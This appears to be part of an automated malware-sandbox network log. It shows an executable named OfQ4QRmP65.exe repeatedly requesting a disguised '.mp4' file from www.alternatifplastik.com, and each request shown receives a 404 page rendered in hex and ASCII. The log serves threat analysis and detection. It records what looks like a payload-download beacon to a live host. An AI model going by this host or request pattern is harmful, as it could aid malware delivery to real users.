                          2025-03-07 14:48:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.11497145.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:29 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:30 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:27 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.11497155.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:31 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:32 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:30 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.11497165.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:34 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:35 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:32 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.11497175.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:37 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:38 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:35 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:38 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.11497205.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:40 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:41 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:38 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.11497215.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:43 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:43 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:41 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.11497225.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:46 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:47 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:44 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.11497235.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:48 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:49 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:47 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.11497245.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:51 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:52 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:50 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.11497255.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:54 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:55 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:52 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.11497265.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:57 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:57 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:55 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.11497275.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:59 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:00 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:58 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
